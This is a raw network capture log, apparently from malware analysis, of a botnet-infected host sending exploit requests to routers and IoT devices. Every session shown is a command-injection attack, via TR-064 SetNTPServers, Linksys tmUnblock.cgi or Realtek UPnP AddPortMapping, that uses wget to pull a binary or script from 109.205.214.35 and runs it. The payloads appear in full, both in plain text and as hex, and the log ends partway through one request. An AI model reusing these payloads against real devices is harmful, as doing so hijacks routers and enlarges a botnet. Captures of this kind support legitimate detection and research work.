                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1570192.168.2.133340831.104.157.1567547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:19.168596983 CET722OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1571192.168.2.1356324172.65.156.24455555
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:19.207238913 CET438OUTPOST /tmUnblock.cgi HTTP/1.1
                                                        Host: 127.0.0.1:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 74 74 63 70 5f 69 70 3d 2d 68 2b 25 36 30 63 64 2b 25 32 46 74 6d 70 25 33 42 2b 72 6d 2b 2d 72 66 2b 7a 65 6e 2e 6d 70 73 6c 25 33 42 2b 77 67 65 74 2b 68 74 74 70 25 33 41 25 32 46 25 32 46 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 25 32 46 6d 70 73 6c 25 33 42 2b 63 68 6d 6f 64 2b 37 37 37 2b 6d 70 73 6c 25 33 42 2b 2e 25 32 46 6d 70 73 6c 2b 6c 69 6e 6b 73 79 73 25 36 30 26 61 63 74 69 6f 6e 3d 26 74 74 63 70 5f 6e 75 6d 3d 32 26 74 74 63 70 5f 73 69 7a 65 3d 32 26 73 75 62 6d 69 74 5f 62 75 74 74 6f 6e 3d 26 63 68 61 6e 67 65 5f 61 63 74 69 6f 6e 3d 26 63 6f 6d 6d 69 74 3d 30 26 53 74 61 72 74 45 50 49 3d 31
                                                        Data Ascii: ttcp_ip=-h+%60cd+%2Ftmp%3B+rm+-rf+zen.mpsl%3B+wget+http%3A%2F%2F109.205.214.35%2Fmpsl%3B+chmod+777+mpsl%3B+.%2Fmpsl+linksys%60&action=&ttcp_num=2&ttcp_size=2&submit_button=&change_action=&commit=0&StartEPI=1


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1572192.168.2.1336246201.213.210.2047547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:19.241938114 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1573192.168.2.1359172212.93.120.20352869
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:19.259479046 CET975OUTPOST /wanipcn.xml HTTP/1.1
                                                        Host: 127.0.0.1:52869
                                                        Content-Length: 630
                                                        Accept-Encoding: gzip, deflate
                                                        SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
                                                        Accept: */*
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
                                                        Connection: keep-alive
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 49 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 2f 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 34 37 34 35 31 3c 2f 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 34 34 33 38 32 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 60 63 64 20 2f 76 61 72 3b 20 72 6d 20 2d 72 66 20 6d 61 74 72 69 78 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 20 2d 4f 20 6d 61 74 72 69 78 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 61 74 72 69 78 3b 20 2e 2f 6d 61 74 72 69 78 20 72 65 61 6c 74 65 6b 60 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 4e 65 77 45 6e 61 62 6c 65 64 3e 31 3c 2f 4e 65 77 45 6e 61 62 6c 65 64 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 73 79 6e 63 74 68 69 6e 67 3c 2f 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 30 3c 2f 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 2f 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47451</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var; rm -rf matrix; wget http://109.205.214.35/matrixexp.sh -O matrix; chmod 777 matrix; ./matrix realtek`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>
                                                        Mar 21, 2024 05:23:19.887367964 CET975OUTPOST /wanipcn.xml HTTP/1.1
                                                        Host: 127.0.0.1:52869
                                                        Content-Length: 630
                                                        Accept-Encoding: gzip, deflate
                                                        SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
                                                        Accept: */*
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
                                                        Connection: keep-alive
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 49 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 2f 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 34 37 34 35 31 3c 2f 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 34 34 33 38 32 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 60 63 64 20 2f 76 61 72 3b 20 72 6d 20 2d 72 66 20 6d 61 74 72 69 78 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 20 2d 4f 20 6d 61 74 72 69 78 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 61 74 72 69 78 3b 20 2e 2f 6d 61 74 72 69 78 20 72 65 61 6c 74 65 6b 60 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 4e 65 77 45 6e 61 62 6c 65 64 3e 31 3c 2f 4e 65 77 45 6e 61 62 6c 65 64 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 73 79 6e 63 74 68 69 6e 67 3c 2f 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 30 3c 2f 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 2f 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47451</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var; rm -rf matrix; wget http://109.205.214.35/matrixexp.sh -O matrix; chmod 777 matrix; ./matrix realtek`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>
                                                        Mar 21, 2024 05:23:21.100296021 CET975OUTPOST /wanipcn.xml HTTP/1.1
                                                        Host: 127.0.0.1:52869
                                                        Content-Length: 630
                                                        Accept-Encoding: gzip, deflate
                                                        SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
                                                        Accept: */*
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
                                                        Connection: keep-alive
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 49 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 2f 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 34 37 34 35 31 3c 2f 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 34 34 33 38 32 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 60 63 64 20 2f 76 61 72 3b 20 72 6d 20 2d 72 66 20 6d 61 74 72 69 78 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 20 2d 4f 20 6d 61 74 72 69 78 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 61 74 72 69 78 3b 20 2e 2f 6d 61 74 72 69 78 20 72 65 61 6c 74 65 6b 60 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 4e 65 77 45 6e 61 62 6c 65 64 3e 31 3c 2f 4e 65 77 45 6e 61 62 6c 65 64 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 73 79 6e 63 74 68 69 6e 67 3c 2f 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 30 3c 2f 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 2f 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47451</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var; rm -rf matrix; wget http://109.205.214.35/matrixexp.sh -O matrix; chmod 777 matrix; ./matrix realtek`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>
                                                        Mar 21, 2024 05:23:23.567341089 CET975OUTPOST /wanipcn.xml HTTP/1.1
                                                        Host: 127.0.0.1:52869
                                                        Content-Length: 630
                                                        Accept-Encoding: gzip, deflate
                                                        SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
                                                        Accept: */*
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
                                                        Connection: keep-alive
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 49 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 2f 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 34 37 34 35 31 3c 2f 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 34 34 33 38 32 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 60 63 64 20 2f 76 61 72 3b 20 72 6d 20 2d 72 66 20 6d 61 74 72 69 78 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 20 2d 4f 20 6d 61 74 72 69 78 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 61 74 72 69 78 3b 20 2e 2f 6d 61 74 72 69 78 20 72 65 61 6c 74 65 6b 60 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 4e 65 77 45 6e 61 62 6c 65 64 3e 31 3c 2f 4e 65 77 45 6e 61 62 6c 65 64 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 73 79 6e 63 74 68 69 6e 67 3c 2f 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 30 3c 2f 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 2f 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47451</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var; rm -rf matrix; wget http://109.205.214.35/matrixexp.sh -O matrix; chmod 777 matrix; ./matrix realtek`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>
                                                        Mar 21, 2024 05:23:28.428318024 CET975OUTPOST /wanipcn.xml HTTP/1.1
                                                        Host: 127.0.0.1:52869
                                                        Content-Length: 630
                                                        Accept-Encoding: gzip, deflate
                                                        SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
                                                        Accept: */*
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
                                                        Connection: keep-alive
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 49 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 2f 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 34 37 34 35 31 3c 2f 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 34 34 33 38 32 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 60 63 64 20 2f 76 61 72 3b 20 72 6d 20 2d 72 66 20 6d 61 74 72 69 78 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 20 2d 4f 20 6d 61 74 72 69 78 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 61 74 72 69 78 3b 20 2e 2f 6d 61 74 72 69 78 20 72 65 61 6c 74 65 6b 60 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 4e 65 77 45 6e 61 62 6c 65 64 3e 31 3c 2f 4e 65 77 45 6e 61 62 6c 65 64 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 73 79 6e 63 74 68 69 6e 67 3c 2f 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 30 3c 2f 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 2f 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47451</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var; rm -rf matrix; wget http://109.205.214.35/matrixexp.sh -O matrix; chmod 777 matrix; ./matrix realtek`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>
                                                        Mar 21, 2024 05:23:38.159354925 CET975OUTPOST /wanipcn.xml HTTP/1.1
                                                        Host: 127.0.0.1:52869
                                                        Content-Length: 630
                                                        Accept-Encoding: gzip, deflate
                                                        SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
                                                        Accept: */*
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
                                                        Connection: keep-alive
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 49 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 2f 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 34 37 34 35 31 3c 2f 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 34 34 33 38 32 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 60 63 64 20 2f 76 61 72 3b 20 72 6d 20 2d 72 66 20 6d 61 74 72 69 78 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 20 2d 4f 20 6d 61 74 72 69 78 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 61 74 72 69 78 3b 20 2e 2f 6d 61 74 72 69 78 20 72 65 61 6c 74 65 6b 60 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 4e 65 77 45 6e 61 62 6c 65 64 3e 31 3c 2f 4e 65 77 45 6e 61 62 6c 65 64 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 73 79 6e 63 74 68 69 6e 67 3c 2f 4e 